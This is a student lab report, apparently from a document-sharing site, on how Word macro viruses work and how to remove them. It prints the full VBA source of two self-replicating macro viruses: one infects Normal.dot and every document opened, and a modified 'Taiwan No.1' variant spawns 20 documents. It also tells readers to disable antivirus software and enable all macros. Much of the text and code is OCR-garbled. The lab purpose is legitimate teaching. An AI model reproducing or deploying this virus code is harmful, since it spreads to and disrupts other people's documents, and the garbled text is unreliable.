林冠臣計算機(jī)病毒防范_第1頁
林冠臣計算機(jī)病毒防范_第2頁
林冠臣計算機(jī)病毒防范_第3頁
林冠臣計算機(jī)病毒防范_第4頁
林冠臣計算機(jī)病毒防范_第5頁
已閱讀5頁,還剩6頁未讀, 繼續(xù)免費閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)

文檔簡介

1、計算機(jī)病毒與防范技術(shù)學(xué)院:信息技術(shù)學(xué)院班級:b1204學(xué)號:0913120414姓名:林冠臣計算機(jī)宏病毒分析及清除實驗一、實驗?zāi)康?了解“宏病毒”機(jī)理。2. 掌握清除宏病毒的方法。3. 掌握采用“宏”和腳本語言進(jìn)行編程的技術(shù)。二、實驗環(huán)境1 .windows xp操作系統(tǒng)。2.office word 2010 字處理軟件。三、實驗要求1. 宏的編寫。2. 理解宏病毒的作用機(jī)制。四、實驗內(nèi)容與步驟:1. 軟件設(shè)置首先檢查電腦里殺毒軟件是否開啟,如果開啟需要關(guān)閉它。然后打開一個word 文檔(我直接打開的“計算機(jī)宏病毒分析及清除實驗”),依次單擊“文件” “選項”,然后在彈出的“word選項”對話

2、框中單擊“信任中心”,然后再單擊 “信任中心設(shè)置”“宏設(shè)置” o選擇“啟用所有宏”,“信任對vba工程對象 模型的訪問”。2宏病毒實現(xiàn)自我復(fù)制功能打開一個word文檔(我打開的“計算機(jī)宏病毒分析及清除實驗”),然后按 alt+fll調(diào)用宏編寫窗口,在左側(cè)菜單欄中依次單擊“project (計算機(jī)宏病毒分析 及清除實驗)” "microsoft word對象” "thisdocument”,在這里輸入實驗 代碼單擊“保存”,這時該文檔就含有了宏病毒,然后單擊“執(zhí)行”,就立刻彈出 一個窗口,第二次打開該文檔,就自動執(zhí)行以上代碼,并將自身復(fù)制到normal, dot 和當(dāng)前文檔的

3、thisdocument中,此時所有的word文檔關(guān)閉時,都將運行以上的 病毒代碼,產(chǎn)生影響。我乂新建立了一個名字為“111”的word文檔,打開后關(guān) 閉就彈出一個捉示框。代碼如下:* macro-1: micro-virussub document_open()on error resume nextapplicat ion. displaystatusbar = falseoptionssavenormalprompt = falseset ourcodernodule = thisdocumcntvbproject. vbcomponents(1)codemoduleset host =

4、 normaltemplate. vbproject. vbcomponents(1). codemoduleif thisdocument 二 normaltemplate thenset host = activedocument. vbproject. vbcomponents (1)codemoduleend ifwith hostif . lines(1, 1) <> micro-virus" thendeletelines 1, countoflines tnsertlines 1, ourcodemodule lines(1, 100).replacelin

5、e 2, "sub document close ()if thisdocumcnt = normaltemplate then.replaceline 2, "sub document_0pcn ()z,activedocument. saveas activedocument. fullnameend ifend ifend withmsgbox b1204-林冠臣-14end sub結(jié)果顯示如下:fftea ®少 a aa猜入 芙面為*? 可用 谿 畝爲(wèi) 視圉雯ai;三疋?=««se20i!本: 4.177個字符閔認(rèn)值).計算micros

6、oft word防范技術(shù)”上圖為復(fù)制完代碼保存后,單擊執(zhí)行的結(jié)呆圖上圖為模板被感染病毒的結(jié)果圖上圖為新建文檔“111”被感染病壽結(jié)果圖3具有一定破壞性的宏本程序是以著名宏病毒“臺灣一號”的惡意代碼部分為基礎(chǔ),對源代碼進(jìn)行了 適當(dāng)?shù)男薷?,這樣降低了破壞性,否則實驗室機(jī)器將受到嚴(yán)重影響。它的環(huán)境和 操作方法與上面的相同。代碼如下:rmacro_2: moonlightdim nm(4)sub document_open()disableinput 1set ourcodemodule = thisdocument.vbproject.vbcomponents( 1 ).codemoduleset

7、host = normaltemplate.vbproject.vbcomponents(l).codemoduleif thisdocument = normaltemplate thenset host = activedocument.vbproject.vbcomponents(l).codemoduleend ifwith hostif .lines(l, 1) <> n'moonlight" then.deletelines 1,countoflines.insertlines 1, ourcodemodule.lines(l, 100) .repla

8、celine 3, "sub document_close()"if thisdocument = nonnaltemplate then.replaceline 3, "sub document_open()uactivedocument.saveas activedocument.fullnameend ifend ifend withcount = 0ifyear(now() = 2015 thentry:on error goto trytest = -1con = 1tog$ = ,hi = 0while test = -1for i = 0 to 4n

9、m(i) = int(rnd() * 10)con = con * nm(i)if i = 4 thentog$ = tog$ + str$(nm(4) + "=?"goto begend iftog$ = tog$ + str$(nm(i) +next ibeg:beepans$ = inputbox$(h今天是” + date$ + “,跟你玩一個心算游戲” + chr$(13) +喏你答錯,只好接受震撼教育” + chr$(13) + tog$, “臺灣no.l macro virus")if rtrim$(ltrim$(ans$) = ltrim$(str

10、s(con) thendocuments-addselection.paragraphs. alignment = wdalignparagraphcenterbeepwith selection.font.name = ”細(xì)明體”.size = 16.bold = 1u nderline = 1end withselection.insertafter text:="何謂宏病毒”selection.insertparagraphafterbeepselection.insertafter text:="答案:"selection.font.italic = 1s

11、election.insertafter text:=h我就是"selection.insertparagraphafterselection.insertparagraphafterselection.font.italic = 0beepselection.insertafter text:="如何預(yù)防宏病毒"selection.insertparagraphafterbeepselection.insertafter text:="答案:"selection.font.italic = 1selection.insertafter tex

12、t:=n不要看我”goto outelsecount = count + 1for j = 1 to 20beepdocuments.addnext jselection.paragraphs. alignment = wdalignparagraphcenterselection. insert after text:="宏病毒"if count = 2 then goto outgoto tryend ifwendend ifout:end sub確定取消結(jié)果顯示如下:2015-04-27,跟你玩y心算游戲臺灣no.l macro virus7* 5* 5* 2* 3=

13、?上圖為打開被感染病毒的word文檔彈出的窗口上面兩個圖是計算錯誤后出現(xiàn)的結(jié)果。新建了 20個word文檔,并月繼續(xù)進(jìn)行計算。,正=如何ftsfi宜霸爲(wèi)答罠不ff倉賽.門 jgo 1上圖為計算正確的結(jié)果圖,即新建一個文檔,并跳出字幕。<kr #« £* /11 艮wtq xp a 3 1azaxaabt aabb( aabb( aabb(4. 清除宏病毒(1) 打開受感染的word文檔,按“alt+fll”進(jìn)入宏編輯環(huán)境,將每個 “project”下的“this document"中的病毒代碼刪除然后保存。(2) 打開模板 anormal microsoft

14、 wordv 對象將"this document,中的病 毒代碼刪除然后保存。注意:清除病毒時候,先清除每個“project"內(nèi)的代碼,在最后一個被感染的文 檔中刪除模板內(nèi)的代碼,否則重新打開其他被感染病毒的文檔,模板再次被感染。五、實驗心得通過本次實驗我實際感受到了宏病毒傳播的可怕性,他會無限的循環(huán),執(zhí)行 惡意代碼,也了解了它執(zhí)行的基本流程。另外在試驗小我遇見了幾個問題實驗我 認(rèn)為應(yīng)該注意以下幾個問題:1. 實驗時候首先要注意實驗環(huán)境與給的參考資料環(huán)境是否一樣,本次實驗就 不一樣,所以冇些步驟會稍冇不同,不能盲目的照著參考資料做實驗,要具體研 究實驗的原理,然后進(jìn)行實驗驗證。2. 根據(jù)這個實驗應(yīng)該是被感染宏病毒后的文檔在打開和關(guān)閉時候都有圖框出 %,因為宏病毒在傳播復(fù)制代碼時候應(yīng)該自動更改函數(shù)名,colse變?yōu)閛pen,但 是我的實驗只有在關(guān)閉文檔時出現(xiàn)圖框,在打開文檔時并不出現(xiàn),在逐條執(zhí)行語 句時候也執(zhí)行open 了但是具體原因還是令我困惑

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論